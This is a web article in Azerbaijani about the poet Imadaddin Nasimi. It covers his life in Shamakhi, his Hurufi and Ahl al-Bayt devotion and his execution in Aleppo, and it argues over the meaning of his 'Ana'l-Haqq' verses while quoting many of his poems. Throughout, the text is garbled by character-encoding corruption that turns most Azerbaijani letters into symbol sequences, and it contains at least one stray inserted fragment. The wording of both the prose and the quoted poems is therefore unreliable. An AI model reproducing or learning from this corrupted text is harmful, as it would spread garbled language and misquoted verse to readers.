INILIFE.RU
Son xəbərlər
Əsas səhifə / Məqalələr / Elm / NE�siminin AYeirlE�ri nE� deyir?!

NE�siminin AYeirlE�ri nE� deyir?!

Seyid ??li Seyid ME�hE�mmE�d oAYlu A�madE�ddin NE�simi 1369-cu ildE� AzamaxA�da anadan olmuAYdur. BE�zi tE�dqiqatA�A�lar onimagesunA�BakA�da doAYulduAYunu iddia edir.
AzE�rbaycan AYairi, dahi mA?tE�fE�kkir “A�mamE�ddin NE�simi” adA� ilE� mE�AYhurdur. Azairin atasA� Seyid ME�hE�mmE�d Azirvanda yaxAYA� tanA�nan AYE�xsiyyE�tlE�rdE�n idi. NE�siminin bir qardaAYA� da olub. Onun AzamaxA�da yaAYadA�AYA�, Azah XE�ndan tE�xE�llA?sA? ilE� AYeirlE�r yazdA�AYA� vE� hazA�rda bu adla tanA�nan qE�dim qE�biristanlA�qda basdA�rA�ldA�AYA� mE�lumdur. A�slamdan sonrakA� dA�vrdE� AzamaxA� iri mE�dE�niyyE�t mE�rkE�zlE�rindE�n birinE� A�evrilmiAYdi. Burada A�oxlu mE�ktE�b, mE�d- rE�sE�, bA?tA?n AzE�rqdE� mE�AYhur olan AYeir vE� musiqi mE�clislE�ri fE�aliyyE�t gA�stE�rmiAY, bundan baAYqa zE�ngin ictimai vE� AYE�xsi kitabxanalar mA�vcud idi. Paytaxtdan bir qE�dE�r kE�narda, ME�lhE�m adlanan yerdE� mE�AYhur AYair Xaqaninin E�misi-alim vE� hE�kim KafiE�ddin tE�rE�findE�n yaradA�lmA�AY Dar-A?AY-AYE�fa tibb akademiyasA� da fE�aliyyE�t gA�stE�rirdi. AzamaxA�dan A?mumiyyE�tlE� bir A�ox AYair vE� alimlE�r A�A�xmA�AYdA�r ki, onlarA�n da arasA�nda bA�yA?k sE�nE�tkar ??fzE�lE�ddin Xaqanini xA?susi qeyd etmE�k lazA�mdA�r.
Azairin E�sE�rlE�rinE� diqqE�t yetirdikdE� bE�lli olur ki, NE�simi AzamaxA�da o dA�vrA?n E�n yaxAYA� universitetlE�rinin tE�lE�binE� cavab verE�cE�k bir dE�rE�cE�dE� kamil tE�hsil ala bilib. A�lk tE�hsilini AzamaxA�da almA�AY, dA�vrA?n elmlE�rini, dinlE�rin tarixini, klassik AzE�rq vE� qE�dim yunan fE�lsE�fE�sini, habelE� E�dE�biyyatA�nA� dE�rindE�n mE�nimsE�miAY, A�slam vE� XristianlA�q dinlE�rinin E�saslarA�na yaxA�ndan bE�lE�d olmuAY, Quran, hE�dis elminE� gA�zE�l yiyE�lE�nmiAY, tarix, psixologiya, etika, coAYrafiya, tibb, astronomiya vE� astrologiya, riyaziyyat vE� mE�ntiq elmlE�rinE� dE�rindE�n qail olmuAYdu. O, AzE�rbaycan, fars vE� E�rE�b dillE�rindE� eyni dE�rE�cE�dE� gA�zE�l mE�zmunlu AYeirlE�r yaza bilirdi. Onun azE�rbaycanca AYerlE�rinin dili hE�m zE�nginliyi, hE�m dE� xalq nitqinE� yaxA�nlA�AYA� ilE� seA�ilir, atalar sA�zlE�ri, zE�rb-mE�sE�llE�r, hikmE�tli sA�zlE�r burada A�oxluq tE�AYkil edir. NE�siminin rA?bailE�ri AzE�rbaycan xalq AYeiri nA?munE�lE�ri olan bayatA�lara A�ox yaxA�ndA�r. NE�siminin poeziyasA�nda AzE�rbaycanA�n, elE�cE� dE� digE�r AzE�rq A�lkE�lE�rinin mE�AYhur alim vE� AYairlE�rinin adlarA� tez-tez xatA�rlanA�r. Bunlardan ??li ibn SinanA�, Xaqanini, Nizamini, FE�lE�kini, HE�llac ME�nsuru, FE�zlullah NE�imini, Azeyx Mahmud AzE�bA?stE�rini, A�vhE�di MaraAYayini vE� baAYqalarA�nA� gA�stE�rE� bilE�rik. Bundan baAYqa NE�siminin E�sE�rlE�rindE� peyAYE�mbE�rlE�rin, imamlarA�n adA� da A�ox vurAYulanmA�AYdA�r. Bunlardan daha A�ox AdE�m(E�), XA�zA�r(E�), Musa(E�), A�sa(E�), ME�hE�mmE�d(s), HE�zrE�t ??li vE� daha sonrakA� 11 imamA�n adA� bir A�ox AYeirlE�rindE� vE�sf edilmiAYdir.
TeymurlE�ng HA?rufilE�ri ciddi tE�zyiqlE�rE� mE�ruz qoyduAYu bir vaxtda NE�simi vE�tE�ndE�n didE�rgin dA?AYA?b, A�raq, TA?rkiyE�, Suriyada yaAYamaAYa mE�cbur olmuAYdu. ME�nbE�lE�rE� gA�rE� NE�simi HA?rufilik tE�limi E�sasA�nda irE�li sA?rdA?yA? panteist ideyalarA� A?stA?ndE� HE�lE�b AYE�hE�rindE� edam olunub. NE�simini TE�brizi nisbE�sindE� tE�qdim edE�n A�bn E�l-A�mad HE�nbE�li yazA�r: a�?O, hA?rufilE�rin AYeyxidir, HE�lE�bdE� sakin idi, tE�rE�fdarlarA� A�oxaldA�, bidE�ti artdA�, iAY o yerE� A�atdA� ki, sultan onun A�ldA?rA?lmE�sini E�mr etdi, boynu vuruldu, dE�risi soyuldu, A�armA�xa A�E�kildi.a�? Faktlar isE� bu mE�nbE�lE�rin ziddinE�dir. NE�siminin E�sE�rlE�ri ilE� tanA�AY olduqda AYairin niyE� edam olunduAYu bizE� E�yan olacaq.
NE�simi 3 dildE� anadili sE�viyyE�sindE�n geri qalmayan AYeirlE�r yazA�b. DemE�k olar ki, NE�simi AYeirlE�rinin mE�zmun cE�hE�tdE�n E�sas mahiyyE�ti Qurani-KE�rimin ideyasA�ndan kE�nara A�A�xmA�r.
NE�siminin E�sE�rlE�ri ilE� yaxA�ndan tanA�AY olduqda dA?nyada ikinci bir AYE�xsin NE�simi qE�dE�r ??hli-beyt(E�) aAYiqi olmasA�nA� demE�k A�E�tindir. BizE� a�?ME�n Allahama�? kE�lmE�sini iAYlE�dE�n kimi tanA�dA�lan NE�simi E�slindE� tE�vazA�karlA�AYA�n E�n yuxarA� mE�rtE�bE�lE�rindE� idi. NE�simiyE� gA�rE� insan A�zA?nA? ??hli BeytE� qul bilmE�sE� Allaha A�ata bilmE�z. ??hli Beyt aAYiqi isE� A�lahiyE� olan sevgini dildE� yox, E�mE�ldE� gA�stE�rmE�li, ??hli Beytin yasaq etdiyi E�mE�llE�rdE�n, yE�ni riyadan, A?cbdE�n, hE�sE�ddE�n, tE�nbE�llikdE�n, qafil olmaqdan A�E�kinmE�lidir. VE� bununla da bE�lli olur ki, NE�simi A�zA?nA? Allah yox, BA�yA?k Yaradan qarAYA�sA�nda aciz mE�xluq hesab edir. a�?Azah sE�nsE�n mE�n gE�dayE�m ya ??li sE�ndE�n mE�dE�da�?, a�?BE�s ??li yolunda xaksar olmaq gE�rE�kdir, xaksara�?. a�? NE�simi, bE�ndeyi QE�mbE�r olubdur, A�akE�re HeydE�ra�?, a�? Xake dE�re ??hli-beytE�ma�?, a�?HamA�dan kE�mtE�rin kE�mtE�r, be cane xake pa gA�rdA?ma�?.. KimlE�rE� isE� adi gA�rsE�nE�n bu ifadE�lE�r E�lbE�ttE� zA�vq E�hli tE�rE�findE�n ayrA� cA?r qarAYA�lanA�r. NE�siminin o dA�vrdE� Yezidi qan iA�E�n it, donuz adlandA�rmasA�na heA� dE� A�tE�ri baxmaq olmaz . NE�simi qeyri- ??hlibeyt ideyalA� hakimlE�rin hA�kmranlA�q etdiyi A�lkE�lE�rdE� yaAYayan mA?tE�fE�kkirlE�r arasA�nda bE�lkE� dE� tE�qiyyE� etmE�yE�n yeganE� AYair idi. BE�hanE� olaraq NE�simini kafir kimi A�ldA?rsE�lE�r dE� E�slindE� buna sE�bE�b onun ??hlibeyti(E�) tE�bliAY etmE�si idi. Sual A�A�xa bilE�r ki, bu cE�za niyE� mE�hz NE�simiyE� AYamil olundu, niyE� NE�simi bu qE�dE�r tE�qib olunurdu? ??lbE�ttE�, cavab A�ox sadE�dir. NE�siminin ??hlibeyt(E�) haqda olan aAYA�r fE�lsE�fE� yA?klA? AYeirlE�ri sanki musiqi bE�stE�sindE� idi. BaAYa dA?AYE�n dE�, baAYa dA?AYmE�yE�n dE� bu rE�van, axA�cA� AYeirlE�ri dillE�rindE� zA?mzA?mE� edirdi. ME�clislE�rdE� NE�siminin qE�zE�llE�ri, qE�sidE�lE�ri oxunurdu. Bu AYeirlE�r qA�lA�nc gA?cA? ilE� dE�yiAYilmE�yE�n beyinlE�rE� daha tez tE�sir edirdi. Bir sA�zlE� NE�siminin rE�van AYeirlE�ri cE�miyyE�t arasA�nda daha sA?rE�tlE� yayA�lA�rdA�.

GE�l ki, mA?AYtaq olmuAYam didarA�na,
VermiAYE�m can zA?lf-i anbE�rbarA�na,
ME�hrE�m etdin A�A?n mE�ni E�srarA�na,
Ey pE�ri, gE�l A�E�k mE�ni bir darA�na.
***
Ey yA?zA?ndE�n zahir E�sma-i huda,
AzA�ylE� ki, Quranda dedi kullE�ha,
AdE�mi bil, andadA�r E�srarha,
Can ilE� baAYA�n yolun qA�l fE�da.
***
EAYq ilE� gE�ldi cE�m-i E�nbiya,
EAYqdir seyrA? sA?luk-i A�vliya,
EAYq ilE� yola girE�rlE�r biriya,
EAYq ilE� vasA�l olurlar tanrA�ya.
***
Al E�lindE�n atA�nA�, yaban at,
HaqpE�rE�st ol, haqqA� tanA�, olma at.
DA?nyanA�n dA�vrA?ndE� yoxdur A�A?n sE�bat,
AtA�nA� qaA�A�rma ruhdan, olma mat.
***
Ey cE�malin QulhA?vallahA? E�hE�d,
SurE�tin yazA�sA� AllahA?ssamE�d
Bir ucu zA?lfA?n E�zE�l, biri E�bE�d,
HA?snA?nE� AYeytan imiAY mE�n la sE�cE�d.
***
Haqq TE�ala varlA�AYA� adE�mdE�dir,
Ev onundur, ol bu evdE� dE�mdE�dir,
BilmE�di AYeytan bu sA�rrA�, gamdadA�r,
Ol sE�bE�bdE�n ta E�bE�d matE�mdE�dir.

HE�min dA�vrdE� AYeirlE�rindE� E�qidE�sinin birbaAYa izharA� siyasi cE�hE�tdE�n NE�simi A?A�A?n A�ox tE�hlA?kE�li idi. XA?susilE� dE� A�zlE�rini ??hlibeyt(E�) mE�zhE�bindE�n hesab edE�nlE�r daim tE�qib olunurdu. Buna baxmayaraq NE�simi A�z ideoloji mE�nsubiyyE�tini gizlE�tmir, iftixarla AYeirlE�rindE� onlara mA?raciE�t edirdi.

ME�n ol sadiq qulam kim, CE�fE�riyE�m.
HE�qiqE�t sA�ylE�rE�m, hE�qq HeydE�riyE�m…
NE�simiyE�m,YezidE� lE�nE�tim var
??zE�ldE�n mE�n dA?A�are XeybE�riyE�m.

NE�simi AYeirlE�rinin birindE� dE�risinin soyulmasA�na fE�tva verE�nlE�ri belE� adlandA�rmA�AYdA�r. a�? Azul pustimi soydu Yezid-ME�rvanilE�ra�?. Buradan bir daha mE�lum olur ki, NE�simi A�slamda tE�riqE�tlE�r zE�minindE� sA?ni AYE�kildE� ixtilaflar yaradan hakimlE�r tE�rE�findE�n tE�qib olunurmuAY, nE�inki ateist vE� ya A�zA?nA? Allah adlandA�rmasA� sE�bE�bi ilE�. a�???nE�lhE�qqa�? kE�lmE�sini dE�fE�lE�rlE� iAYlE�dE�n NE�simi dA?AYmE�nlE�rinin onu baAYa dA?AYmE�mE�lE�rini dE� AYeirlE�rindE� vurAYulamA�AYdA�r.

Azul Yezid-ME�rvanilE�r, pustimi soydu qazilE�r,
ME�n a�???nE�lhE�qqa�? A�aAYA�rA�b ME�nsurilE�n bir dar idim.
SoydilE�r pustimi aldA�m qayib, oldum olzaman,
KimsE� bilmE�z bu rE�muzi, hE�qqlE� sE�rdar idim.

NE�simi A?rfan mE�ktE�binE� tE�kcE� nE�zE�ri cE�hE�tdE�n yox, praktiki cE�hE�tdE�n dE� mA?raciE�t etdiyi A?A�A?n onu A�ox vaxt baAYa dA?AYmA?rdA?lE�r. A?rfan nE�zE�riyyE�sindE�n bir qE�dE�r mE�lumatA� olan AYE�xs yaxAYA� bilir ki, Seyri-sA?luk yolunda arifcE�sinE� irE�lilE�yE�n salik hara baxdA�qda ilahi tE�cE�llanA� gA�rA?r vE� o baxA�mdan dA�nA?b A�zA?nE� baxanda ilahi niAYanE� adlandA�rA�r A�zA?nA?.

HE�qq TE�ala AdE�m oAYlu A�zA?dA?r,
Otuz iki HE�qq kE�lamA� sA�zA?dA?r.
CA?mlE� alE�m bil ki, Allah A�zA?dA?r,
AdE�m ol candA�r ki, gA?nE�AY yA?zA?dA?r.

Arif bundan sonra a�???nE�lhE�qqa�? deyE�ndE� A�zA?nA? Allah yox, A�lahi varlA�qda yaradA�cA�nA�n niAYanE�si kimi gA�rA?r. a�???nE�lhE�qqa�?mE�fhumunu baAYa dA?AYmE�yE�nlE�ri NE�simi qE�flE�tdE� olduqlarA�na gA�rE� qA�nayA�r, onlarA�n yE�qin E�hli olmadA�qlarA�ndan, hE�miAYE� gA?man E�hli olduqlarA�ndan bu mE�sE�lE�dE� A�aAYA�b qaldA�qlarA�nA� bildirir. HE�zrE�t ??lidE�n(E�) belE� bir hE�dis var. a�?A�zA?nA? tanA�yan AllahA� tanA�yara�?. NE�simi insanA�n, alE�min A�lahi bir niAYanE� olduAYunu mE�harE�tlE� AYeirlE�rindE� tE�rE�nnA?m etmiAYdir.

Qeyb vE� gA?mandan A�zgE� ey zahid urma dE�m ki,
HE�qqA?lyE�qin buldum, tE�rk eylE�dim gA?manA�.
ME�nsur E�nE�lhE�qq aydA�r, yE�ni ki, hE�qq mE�nE�m, hE�qq,
HE�qq A�un E�yanmA�AY, gA�r, kim gA�rmA?yE� E�yanA�.

HE�zrE�t ??lidE�n(E�) bu barE�dE� hE�dis dE� qeyd olunmuAYdur. a�?ME�n gA�rmE�diyim Allaha ibadE�t etmE�rE�m.a�? ??gE�r NE�simi A�zA?nA? Allah bilsE�ydi ??hli-Beytin qapA�sA�nA�n tozu demE�zdi A�zA?nE�. Onun a�?QiblE�gahA�mdA�r ME�hE�mmE�d, sE�cdE�gahA�mdA�r ??lia�? qafiyE�si ilE� yazdA�AYA� AYeir A�zA?nA? insan A�vladA� hesab etmE�sinE� bir daha sA?butdur.

NE�simi AYeirlE�rindE� ??hli-Beyt. A�ox A�E�tin bir dA�rdE�, ??hli-Beyt(E�) mE�sumlarA�nA�n adA�nA� A�E�kE�n AYE�xslE�rin tE�qib olunan vaxtA� NE�simi qorxmadan iftixar hissi ilE� a�? Kim ME�hE�mmE�di ??lidE�n ayrur lE�nE�t ona, LE�hmikE� lE�hmi deyilmi, ya ??li sE�ndE�n mE�dE�da�? demiAY vE� 14 mE�suma onlarla AYeirlE�r yazmA�AYdA�r. AAYaAYA�dakA� AYeiri bunun tam tE�sdiqidir.

ME�n qulami xanE�danam, padiAYahA�mdA� ??li,
EhtiyacA�m var ona pA?AYdA?-pE�nahA�mdA� ??li,
KA�nlA?mA? qA�ldA� mA?nE�vvE�r, mE�rhE�manA�mdA� ??li,
QiblE�gahA�mdA�r ME�hE�mmE�d , sE�cdE�gahA�mdA�r ??li.
GE�ldilE�r hE�qdE�n bE�yanE� sirri aAYaz etdilE�r,
SA�zlE�ri ilE� bu cahan mA?lkinE� pE�rvaz etdilE�r,
HE�mdA?lillah, biz gE�danA� mE�hrE�mi-raz etdilE�r,
QiblE�gahA�mdA�r ME�hE�mmE�d , sE�cdE�gahA�mdA�r ??li.
Ta E�zE�ldE�n padiAYahA�mdA�r HE�sE�n xA?lqi-riza,
DA?nyavi A?qbE�da sE�rtacA�m HA?seyni KE�rbala,
Nuri A�eAYmimdir A�mam Zeynul-A�bad,
QiblE�gahA�mdA�r ME�hE�mmE�d , sE�cdE�gahA�mdA�r ??li.
Canu dildE�n bE�ndE�ye Baqir, qulami CE�fE�rE�m,
Museyi-KazA�m, A�mam Rzaya kE�mtE�rE�m
Azah TE�qi, Baba NE�qi yolunda paki-bE�stE�rE�m,
QiblE�gahA�mdA�r ME�hE�mmE�d , sE�cdE�gahA�mdA�r ??li.
MasE�va tE�rk eylE�yib bizlE�ri diyari lE�hlE�tE�,
Hakim onlardA�r, bu gA?n layiqdir onlar hA�rmE�tE�,
Lah deyE�nlE�r uAYrayA�rlar bu cahanda mA�hnE�tE�,
QiblE�gahA�mdA�r ME�hE�mmE�d , sE�cdE�gahA�mdA�r ??li.
CA?mlE�miz arzu edE�nlE�r ??skE�riyyE� E�sgE�rA?z,
Mehdiyi-Sahib Zamana biz tE�vE�lla eylE�riz,
HE�mdillah eylE� Ey NE�simi, biz yolunu gA�zlE�riz,
QiblE�gahA�mdA�r ME�hE�mmE�d, sE�cdE�gahA�mdA�r ??li.

NE�simi AYeirlE�rindE� Quran

NE�siminin AYeirlE�rindE� Qurana mA?raciE�t diqqE�tE�layiq dE�rE�cE�dE� A�oxdur.

Ey cE�malA�n Qul huvE�llahu E�hE�d.
SurE�tin yazA�sA� Allahus SamE�d.
Bir ucu zA?lfA?nA?n E�zE�l, biri E�bE�d.
HA?snA?nE� AYeytanmA�AY mE�n lE� sE�cE�d.
***
Ey saA�A�n vE�lleyl, A?zA?n vE�lE�zzA?ha,
SurE�tin AYanA�nda qul kE�fa,
Ey saA�A�ndan A�un E�yan oldu mE�nE�,
Sirre E�lrE�hman E�la E�lE�rAY A?stA?vE�.

AAYaAYA�dakA� AYeirdE� NE�simi QuranA�n a�?kun fE�yE�kuna�?(ol desE�m olar) ayE�sindE�n mE�harE�tlE� istifadE� edE�rE�k yaradA�lA�AYa toxunmuAY vE� hE�min cA?mlE�nin ilk(k hE�rfi) vE� son hE�rfini(n) yaradA�lA�AYA�n baAYlanAYA�cA� hesab etmiAYdir.

Kaf vE� Nun E�mrindE�n oldu kainat,
HE�m sifE�tdir Kaf vE� Nun, hE�m eyne zat.
Kaf vE� Nundan vacib oldu mA?mkA?nat,
BE�lkE� sE�nsin alE�mE� zat vE� sifat.

Allah alE�mi xE�lq edE�rkE�n a�?Kun fE�yE�kuna�? (ol desE�m olar) demiAYdir vE� NE�simiyE� gA�rE� bu yaradA�lA�AY Kaf Nuna yetmE�miAY baAY vermiAYdir. Bununla da NE�simi sA?but etmE�k istE�miAYdir ki, AllahA�n etdiklE�ri A?A�A?n zaman mE�hdudiyyE�ti yoxdur. HE�min a�?Kun fE�yE�kuna�? ayE�sinin aA�A�qlamasA� bizim dE�rkimiz A?A�A?ndA?r.

NE�simi AYeirlE�rindE� fE�lsE�fE�

Daim E�nE�l-hE�qq sA�ylE�rE�m, neA�A?nki ME�nsur olmuAYam,
Kimdur mE�ni bE�rdar edE�n, bu AYE�hrE� mE�nsur olmuAYam.

QiblE�siyE�m sadiqlE�rin, mE�AYuqiyE�m aAYiqlE�rin,
ME�nsuriyE�m layiqlE�rin, mE�n beytE� mE�mur olmuAYam.

Musa mE�nE�m ki, haqqilE� daim mA?nacat eylE�rE�m,
KA�nlA?m tE�cE�lla Turudur, onun A?A�A?n Tur olmuAYam.

A�rdim qaAYA�n mehrabA�na kim, qabi-qA�vsA?n ordadA�r,
VE�slE�t AYE�bindE� gA�r mE�ni, sE�r ta qE�dE�m nur olmuAYam.

BE�zmi E�zE�ldE� iA�miAYE�m vE�hdE�t meyin peymanE�sin,
Ol cA?rE�dir ki, ta E�bE�d sE�rmE�st-o mE�xmur olmuAYam.

Ey ay uzundur val-zE�ha vE� leyl-imiAY saA�un qara,
LE�lA?n mE�nE� dar-ul-AYE�fa, oldur ki, rE�ncur olmuAYam.

HE�r yanE� ki, dA�nE�r A?zA?m, orda gA�rA?r hE�qqi gA�zA?m,
A�un bu qE�mindE�n qE�m yedim, AYadan-o mE�srur olmuAYam.

Ol AYahidi qeybi mE�nE�m ki, kainatin eyniyE�m,
Ol nitqi rE�bbani mE�nE�m ki, dildE� mE�zkur olmuAYam.

A�un on sE�kkiz min alE�mE�, oldu vA?cudum ayinE�,
Ol surE�ti rE�hman mE�nE�m ki, dildE� mE�zkur olmuAYam.

Ol gizli gE�ncin sirriyE�m ki, zahir oldu gA�zlE�rim,
Ol gA�vhE�rE�m ki, gA?n kimi alE�mdE� mE�AYhur olmuAYam.

A�un mE�n NE�simi gA�vhE�rE�m, gE�ncim sizE� faAY eylE�rE�m,
ME�n bu dolu viranE�dE� gA�r ki, nE� mE�mur olmuAYam.

***
HE�qq TE�ala AdE�m oAYlu A�zA?dA?r,
Otuz iki HE�qq kE�lamA� sA�zA?dA?r.
CA?mlE� alE�m bil ki, Allah A�zA?dA?r,
AdE�m ol candA�r ki, gA?nE�AY yA?zA?dA?r.

Filosoflar NE�siminin bu mE�zmunda olan AYeirlE�rindE� A�ox zaman yanlA�AYlA�AYa yol verirlE�r. AAYaAYA�dakA� AYeirin anlaAYA�lmasA� isE� tamamilE� islami mE�lumat tE�lE�b edir.

Yox ikE�n yer ilE� gA�ylE�r, mE�n E�zE�ldE�n var idim .
GA�vhE�rin yekdanE�sindE�n eylE�r vE� pE�rgar idim.
GA�vhE�ri ab eylE�dim, dutdi cE�hani sE�rtasE�r,
Yer, gA�yA?, E�rAYi, kA?rsA? yaradan SE�ttar idim.
Girdim AdE�m donuna, hiA� kimsE� sirrim bilmE�di
ME�n bu beytullah iA�indE� ta E�zE�ldE�n var idim.
GE�zmiAYE�m mE�n on sE�kkiz bin alE�mi gE�rdiAY ilE�
DE�ryanA�n altA�nda sacA� qA�zdA�ran E�nar idim .
Azul Yezid-ME�rvanilE�r, pustimi soydu qazilE�r,
ME�n a�???nE�lhE�qqa�? A�aAYA�rA�b ME�nsurilE�n bir dar idim.
SoydilE�r pustimi, aldA�m qayib, oldum ol zaman,
KimsE� bilmE�z bu rE�muzi, hE�qqlE� sE�rdar idim.
ME�n NE�simiyE�m, hE�qqi hE�q tanA�mA�AYam bigA?man,
O idi mE�ni yaradan, hE�m mE�n ona dE�rkar idim.

NE�simin bu AYeirini bE�zE�n sE�hv olaraq XE�taiyE� mE�nsub edirlE�r. NE�siminin AYeirlE�rindE� AdE�m A�vladA�na verilE�n qiymE�tE� bE�lkE� dE� heA� bir AYairlE�rin E�sE�rlE�rindE� rast gE�lmE�k mA?mkA?n deyil. ??lbE�ttE� NE�siminin fikri A�nsanA� Allah tanA�maq yox, AYeytanA�n bu cA?r dE�yE�rli yaradA�lmA�AY AdE�mE� sE�cdE� etmE�mE�sinE� iAYarE�dir.

Ey cE�malA�n Qul huvE�llahu E�hE�d.
SurE�tin yazA�sA� Allahus SamE�d.
Bir ucu zA?lfA?nA?n E�zE�l, biri E�bE�d.
HA?snA?nE� AYeytanmA�AY mE�n lE� sE�cE�d.

Bu AYeirdE� NE�simi ilahi mE�qamda olan AdE�m A�vladA�nA� AllahA�n niAYanE�si bilir vE� AYeytanA� insana sE�cdE� etmE�mE�sinE� gA�rE� AllahA�n E�mrindE�n A�A�xmA�AY hesab edir. BE�AYE�rin peyAYE�mbE�rlE�rE� rE�hmE�t olaraq yaradA�ldA�AYA�nA� NE�simi A�ox gA�zE�l AYE�kildE� tE�rE�nnA?m edir.

A�sanA�n vE�sli bilE�n ME�ryE�mdE�dir,
HE�qqi SA?leyman hikmE�ti XatE�mdE�dir.
On sE�kkiz min alE�min sE�rmayE�si,
VE�lE�qE�d kE�rrE�m bE�ni AdE�mdE�dir.
***
HE�r nE� yerdE�, gA�ydE� var AdE�mdE� var.
HE�r nE� ayda, ildE� var AdE�mdE� var.
HE�r nE� E�ldE�, A?zdE� var qE�ddimdE� var.
HE�qq sA�zA?n fE�hm etmE�yE�n adE�m dE� var.

NE�simi AYeirlE�rindE� E�xlaq

NE�siminin tE�nqid hE�dE�flE�rindE�n biri dE� A�zlE�rini arif kimi gA�stE�rE�n bE�zi sufilE�r idi.

Bir mE�gE�sdir balA� yox.
Bir aAYacdA�r barA� yox…

Burada NE�simi o dA�vrA?n hakim dairE�lE�rini, E�qidE�siz din xadimlE�rini, riyakar zahidlE�ri A�zlE�rini balverE�n arA�ya bE�nzE�tmE�k istE�sE�lE�r dE� mE�gE�s (milA�E�k) adlandA�rmA�AY, barsA�z aAYaca bE�nzE�tmiAYdir. NE�siminin nE�sihE�tamiz AYeirlE�ri dE� tE�rbiyE�vi cE�hE�tdE�n A�ox mA?hA?mdA?r. AzeirlE�rinin birindE� E�dib tE�riqE�t A�aAYqinlA�AYA�nda qalanlara belE� buyurur:

Ey kA�nA?l hE�r bivA?cuddan can umursan, nE� E�cE�b.
BikE�rE�mdE�n lA?tfilE�n, ehsan umursan, nE� E�cE�b.
BiAYE�riE�tlE�r nE� bilsA?n E�nbiyanA�n AYE�rtini,
BitE�riqE�tdE�n rE�he E�rkan umursan, nE� E�cE�b?!
BibE�srdE�n mE�niye AYA�vqe kE�male mE�rifE�t,
BixE�bE�rdE�n sA�hbE�te A?rfan umursan, nE� E�cE�b?!
HE�r qayanA�n lE�li olmaz, hE�r dE�nizin gA�vhE�ri,
HE�r sE�dE�fdE�n loloye mE�rcan umursan, nE� E�cE�b?!
A�un ??zrayil E�hsE�ne tE�qvimE� baAY endirmE�di,
Onda sirre kE�beye HE�nnan umursan, nE� E�cE�b?!
Divuna mE�hrum ke, tutmaz isme ??zE�mdE�n xE�bE�r,
??hrimE�ndE�n rE�hmE�te RE�hman umursan, nE� E�cE�b?!
HeA�miAY zA�hdA? vE� zerqi, zahidin E�fsanE�si.
Azul fE�qihdE�n mE�niye Quran umursan, nE� E�cE�b?!
Umma hE�r qE�lbi zoAYaldan aAYiqin E�srarA�nA�.
Kafirin kA�nlA?ndE� sE�n iman umursan, nE� E�cE�b?!
Ey NE�simi, bivE�fadan umma gE�l rE�sme vE�fa.
BivE�fadan E�hdilE�n peyman umursan, nE� E�cE�b?!

Fani dA?nya, dA?nya malA� NE�simi gA�zA?ndE� dE�yE�rsiz bir AYeydir vE� eyni zamanda riyakar zahidlE�ri dE� dA?nya qE�flE�tindE� olanlardan hesab edir.

DA?nya A�un murdardA�r iyrE�n kA�nA?l murdardan,
GA?l deyil dA?nya, tikandA�r nE� umarsan xardan.
DA?nyada bir yar vE�falA� kimsE�nE� gA�rmA?AY degil,
FareAY ol barA�, nE� hasil AYul vE�fasA�z yardan.
AxirE�t yarA�ndan istE� hE�r nE� mE�qsudun ki, var,
DA?nyanA�n miqdarA� yoxdur, keA� bu bimiqdardan.
MA?ddE�eye cA�vrA?- cE�fasA�n hE�ddE�n aAYrA�dA�, vE�li,
Yar E�gE�r yarA� qA�lA�rsa qE�m, degil E�AYyardan.
A�un NE�simi, zahidin halA�nA� bildin kim nE�dir,
MeydE�n ikrah eylE�mE�z, qafil degil xumardan.

NE�simidE� A?rfani eAYq

NE�siminin eAYq haqda olan AYeirlE�ri fE�lsE�fi baxA�mdan dA?nya E�dE�biyyatA�nA�n AYedevri sayA�la bilE�r. NE�simiyE� gA�rE� eAYq yalnA�z Allaha olmalA�dA�r. Bunu isE� yE�qin E�hli olan ariflE�r duyar. NE�simi insanA�n yaradA�lA�AYA�nA�n mE�nbE�yini EAYqdE� gA�rA?r. BE�zE�n alimlE�r bunu qadA�n-kiAYi arasA�nda olan eAYqlE� qarA�AYdA�rA�r. Sual yaranA�r ki, bE�s AdE�mlE� HE�vvanA� hansA� insanlarA�n eAYqi yaradA�b? NE�ticE� bunu gA�stE�rir ki, NE�simi yaradA�cA� eAYqi A�nE� A�E�kE�ndE� A�lahi eAYqi nE�zE�rdE� tutur.

EAYqlE� gE�ldi cE�mi E�nbiya
EAYq idi seyre sA?luke A�vliya
EAYqilE� yola girE�rlE�r biriya
EAYqilE� vasil olurlar tanrA�ya

AAYiqdE� KA�vsE�r hE�srE�tini NE�simi aAYiqcE�sinE� bizE� A�atdA�rA�r

A�un cE�malA�n mE�hAYE�rin gA?lzarA�dA�r,
Hoze KA�vsE�r pE�s dodaAYA�n narA�dir,
HE�r ke olsa vE�sle hA?snA?ndE�n cA?da,
Ona firqE�t bE�s cE�hE�nnE�m narA�dir.

NE�simi burada aydA�ndA�r ki, “Hoze -KA�vsE�r” deyE�ndE� ??hli-beyti(E�) nE�zE�rdE� tutmuAYdur. Kim ki, ??hli-beyt(E�) yolunda olarsa, CE�nnE�tdE� “KA�vsE�r” hovuzuna qovuAYacaqdA�r. ??ks halda bu mA?mkA?n deyildir. NecE� ki, susuz dodaq hE�srE�tindE� olduAYu suyaA�qovuAYmaq istE�r, insan da gE�rE�k bu KA�vsE�r hovuzuna o cA?r aAYiq ola. A�nsan suya hE�miAYE� ehtiyac hissi duyur vE� bu zaman suyu ilk hiss edE�n orqan dodaq olur. NE�simi dodaqla suyun bu cA?r a�?eAYqlE�a�? qovuAYmasA�ndan A�ox gA�zE�l istifadE� etmiAY vE� bizE� A�atdA�rmaq istE�miAYdir ki, insan hE�r zaman ??hli-beyt(E�) yolunun nE�ticE�si olan KA�vsE�r hovuzuna AYA�vqlE� can atmalA�dA�r….

AAYiqin seyranA� AYul alE�mdE�dir,
GA�rmE�yE�n ol alE�mi matE�mdE�dir.
Kuntu kunzE�lin gA�vhE�ri AdE�mdE�dir,
AdE�m ol meydir ki, came cE�mdE�dir.

